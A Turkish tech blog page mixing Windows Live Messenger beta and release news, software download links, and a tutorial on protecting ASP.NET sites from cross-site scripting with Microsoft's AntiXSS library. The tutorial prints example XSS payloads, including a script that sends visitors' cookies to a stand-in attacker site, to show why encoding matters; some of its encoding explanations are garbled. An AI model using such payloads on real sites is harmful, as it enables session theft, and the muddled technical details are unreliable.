Windows Live MEssenger Beta Test Yayını Başladı..

Hello from the Windows Live Messenger Team!

We’ve been hard at work building the foundation for Windows Live Messenger 9.0, we’d like to give you a look at what we’ve built and ask what you think. We’re running a small private beta to get early feedback on the new features we’ve built and get wider test coverage of the build.

As a beta tester you’ll have access to an early 9.0 build, a private newsgroup just for Windows Live Messenger beta testers, and the ability to send bugs directly to the product team. The build you’ll be beta testing with is a very early build, so it may be less stable than beta builds you’ve tried in the past. We’re telling you this upfront so you know what you’re getting into. If you’re not sure about trying a not-quite polished build, maybe this beta isn’t for you. If you’re ready to dig in and explore this build with us, follow the below instructions to nominate yourself.

Click “Invitation” in the left nav pane
Enter this invitation ID: xxx
Click Go
Fill out the nomination survey
We’ll review all survey responses and accept as many people into the beta as we can. Look for mail from us soon!

We look forward to hearing from you!
The Windows Live Messenger Team

________________

Just two weeks after the release of Windows Live Messenger 2008 (aka version 8.5), Microsoft begins the Beta for version 9.0 of their instant messaging client for the Windows Operating System. The Beta kicked off about 10 hours ago with e-mails being sent to some of those who were involved in testing previous Messenger builds. For those of you who want to test this version, unfortunately it’s a private, invitation-only, Beta this time round. Current Beta testers are not able to send invitations to friends and family as Microsoft has decided to go back to the Beta testing method used back in the Msn Messenger days, where only they can invite people to participate in Beta’s (at least for this round of the Beta).
If you were lucky enough to receive an invitation e-mail from Microsoft, head over to Microsoft Connect as soon a possible to sign-up using the details given in the e-mail as spaces for participation in this Beta are very limited.
That’s all the news we have for you about the latest Messenger Beta, we’ll post more as soon as we get it.

Liveside’da belirtilene göre Microsoft, Windows Live Wave 2 olarak adlandırdığı yeni paketini Çarşamba günü sunmaya hazırlanıyor. Bu paket bazı yazılımların, Messenger 8.5 gibi, Beta olmayan resmi sürümlerini içeriyor. Paketin içeriği şöyle;

Yazılım olarak: WL Messenger 8.5, Windows Live Mail, Windows Live Writer, Photo Gallery ve Onecare dahilinde Family Safety
İnternet Servisi olarak: WL Hotmail, WL Events*, Skydrive and Live Search 2.0

Ayrıca Microsoft, yeni Wave 2 paketi için bir de sayaç sitesi hazırlamış.

Güncelleme: Yazılım paketini, Çarşamba’yı beklemeden buradan (Türkçe) indirebilirsiniz.

Messenger için plus live eklentisi =)..

8.x sürümleri ile uyumludur.

Mssenger Plus! Live, Msn Messenger ve Windows Messenger için en iyi eklentidir.
Gerek sunduğu ekstra özellikler ile gerek güvenlik hizmetleriyle vazgeçilmez hale geliyor. Örneğin; tüm günlüklerinizi şifreliyor ve şifreyi bilmeyenler sizin günlüklerinizi okuyamıyor. Renkli rumuz (nick) yapabilme olanağı, tek tuşla Messenger’ı kapatabilme, arkaplan rengini değiştirebilme gibi özellikleriyle farkını ortaya koyuyor. Program kurulumunda size reklam desteğinin yüklenip yüklenmeyeceği soruluyor. Bu soruya hayır cevabını verirseniz sisteminize herhangi bir tehlikeli yazılım eklenmiyor. Program son virüs veritabanına sahip 3 Antivirüs yazılımı ile kontrol edilmiş ve herhangi bir virüs ya da zararlıya rastlanmamıştır.

Size: 3.21 Mb

Download

Windows Live Messenger 8.5 Final – 8.5.1302.1018

Windows Live Messenger 8.5.1302.1018 Yayınlanmıştır.

Download:
http://g.live.com/1rewlive/tr/WLInstaller.exe

Uyumlu Discovery :

http://www.hell-world.org/user/discovery/messengerdiscovery-live.php.htm

CamStudio 2.1.051

CamStudio ile bilgisayarınız üzerinde yaptıklarınızı video olarak kaydedebilirsiniz.
Bilgisayarınız üzerinde hangi işlemi yaparsanız yapın bunları video olarak kaydedebiliyorsunuz.Video kayıt formatlarını,SWf ya da AVI olarak kaydetme imkanına sahip.Görüntü kalitesinin mükemmele yakın,ayar seçeneklerinin çeşitliliği,kullanım kolaylığı, ve kayıt edilen formatlar arasında dönüşüm imkanını sağlaması camstudio’yu benzerlerinden farklı kılıyor.

http://w14.easy-share.com/9010881.html 

fact bites sitesi bir arama motoru olmasından ziyade Google, yahoo ve Msn den farkı; anlamsız, işe yaramayan arama sonuçlarını ayıklayıp bunları anlamlı, kullanıcının işine yarayacak bir şekilde süzüp, sonuçları öyle göstereceğini vaad ediyor. hakia benzeri de denebilir.

500 mb olarak yola başlayan skydrive artık 1 gb depolama alanı sunabilmekte.

Hala beta aşamasında olan bu Live hizmeti henüz herkese açık bir beta değil. (bölgeniz amerika değilse kaydolamıyorsunuz.)

Skydrive‘ın betadan çıkıp belkide xdrive‘ı yakalamasını sabırsızlıkla bekliyoruz

Bu kadar bilgiden sonra Xss nin hala var olduğunu düşünerek korunma yollarımıza göz atalım.

Cross Site Scripting bilindiği gibi saadece maillerde değil web sitelerini hackleme yöntemleri arasında ‘da bulunmakta.. Ayrıntılı bilgi için Buraya Bakabilirsiniz..

Makalemizde Cross Site Scripting açığından korunmak için gerekli yolları Microsoft tarafından piyasaya sürülen program ile anlatacağım..

Öncelikle Microsoft ‘un resmi sitesindeki Microsoft.Application.Security.AntiXSS‘yazılımı bilgisayarımıza inndiriyoruz..

Kurulum evreleri Gif örneyi :

Programı install ettikten sonra artık neye yaradığından bahsedelim =)

Microsoft.Application.Security.AntiXSS namespace’inden ulaşabileceğimiz 7 vazgeçilmez metot ile hedeften sitemizi kaçırıcaz bu metotlar ;

• HtmlEncode
• HtmlAttributeEncode
• JavaScriptEncode
• UrlEncode
• VisualBasicScriptEncode
• XmlEncode
• XmlAttributeEncode

Örnek : l

HTML Code:

tAd.Text = “‘); location.href=’[url]http://www.hackhell.com’;[/url] alert(’a”);

— Bunun yerine ;

Olması Gereken : l

Code:

tAd.Text = JavaScriptEncode(”‘); location.href=’http://hackhell.com’; alert(’a”);

Neden böyle olması gerekiyor diye kendi kendinize sorabilirsiniz ANTİXSS kütüphanesi belli başlı karakterleri ” Encode ” eder bunlar ascii değeri 160-255 olan karakterlerdir.

_______________
ProfessionaL’lar için
Biraz daha ayrıntıya inerisek;

Kullanıcıdan alınan bilgi olduğu gibi veritabanına kaydediliyorsa ve aynı şekilde veritabanındanda istemciye gönderiliyorsa kötü niyetli kodların istemci tarafından çalıştırılması muhtemeldir.

Örneğin bir ziyaretçi defteri doldururken mesaj kısmına

Code:

<script> location.href= ‘http://www.google.com’;</script>

Gibi bir bilgi girilirse ve herhangi bir kontrol olmadan bu siteyi ziyaret eden kullanıcılara bu bilgi gönderilirse, ziyaretçiler karşılarında sizin sitenizi değil, Google’ı göreceklerdir.

Ziyaretçilerin tarayıcılarında çalıştırılan bir javascript kodu ziyaretçiniz hakkındaki Session bilgilerinin de çalınmasına sebep olabilir.

Code:

<script>
document.location='http://www.kotuniyetlisite.com/yaz.aspx?a='+document.cookie
</script>

Şeklinde girilen bir script sitenizi ziyaret eden her kullanıcının Session bilgilerini saldırganın sitesine gönderir. Bundan sonrası saldırganın tercihne kalmış. Session bilgilerini kendine mail atabilir yada kendi veritabanına kaydebilir.

Asp.NET programcıları bu konuda diğer web geliştiricilerinden biraz daha şanslı. Çünkü, “<” ve “>” karakterleri içinde gelen bilgi “Potansiyel Tehlikeli Bilgi” olarak algılanır ve sistem hata verir.

Ancak günümüz de sık geliştirilen “İçerik Yönetim Sistem” leri “FCK Editor” gibi html kodu üreten WYSWYG* editörleri kullanmakta.

Bu da Asp.NET programcısının “Fck Editor” kullandığı sayfasının başına ValidateRequest=”false” gibi bir kodu eklemesine sebep veriyor. Bu da XSS saldırıları için bir davet anlamına gelir.

Buraya kadar verdiğimiz örnekler HTML kodları arasına sızan tekniklerdi.

Kullanıcıdan alınan bilgi ile oluşturulabilecek JavaScript, VBScript, XML de bu tehlikelere maruz kalabilir.

Javascript için basit bir örnek verelim.
Default.aspx dosyamızda bulunan Javascript :

Code:

<script type="text/javascript" >
        alert('Merhaba’ + ‘<asp:Literal runat="server" id="ltAd" />');
</script>

Default.aspx.cs dosyasından gönderilen bilgi :

Code:

ltAd.Text = "heLL";

Sayfa çalıştırıldığında “Merhaba heLL” şeklinde bir MessageBox çıkıyor.

“heLL” değerinin veritabanından geldiğini farzedelim. Eğer veritabanından gelen şöyle bir şey olursa :

Code:

ltAd.Text = " ' location.href='http://www.google.com'; alert('a";

Sayfamız derlendiğinde ortaya çıkan Javascript kodunu inceleyelim :

Code:

<script type="text/javascript" >
alert('Merhaba '); location.href='http://www.google.com'; alert('a');
</script>

Ziyaretçi “Merhaba” şeklinde bir MessageBox görür ve kendini yine Google da bulur.

Bu konuda örnekler çoğaltılabilir.

Yukarıda verdiğim örnek ile ;

Code:

ltAd.Text = "');  location.href='http://www.google.com'; alert('a");

yerine;

Code:

using Microsoft.Security.Application.AntiXss;

...

ltAd.Text = 
JavaScriptEncode("'); location.href='http://www.google.com'; alert('a");

Şeklinde kullandığımızda bir ziyaretçilerimiz bir zarar görmeyecektir.

Sayfamızı derledikten sonra oluşan Javascript kodumuzu inceleyelim :

Code:

<script type="text/javascript" >
        alert('Merhaba '\x27\x29\x3b 
        location.href\x3d\x27http\x3a\x2f\x2fwww.google.com\x27\x3b 
        alert\x28\x27a');
</script>

Görüldüğü gibi “)“ işareti \x27 ye , “;” işareti \x29 a ve diğer zararlı karakterlerde Javascript’in karşılıklarına çevrilmiş. Bu kodlar çalıştırılamaz ama aynı karaktersel değerleini korurlar.

Örneğin

Code:

ltAd.Text = Microsoft.Security.Application.AntiXss.JavaScriptEncode("heLL");

Şeklinde bir kullanımda ekranda “heLL” yazar ancak kaynak kodunda “ç” karakteri \u00e7 olarak kodlanmıştır.

“ç” harfi ascii tablosunda bulunmuyor ancak unicode değer olan 351’in Hexadecimal eşiti 00e7 dir. Dolayısıyla Javascript’tin ç harfini \u00e7 olarak tanır. .

Saygılar…

Not: Konunun Bir Kopyası Security Bölümün’de Diğeri ise mail hacking seucirty bölümünde sabitte-kilitli olarak bulunmaktadır.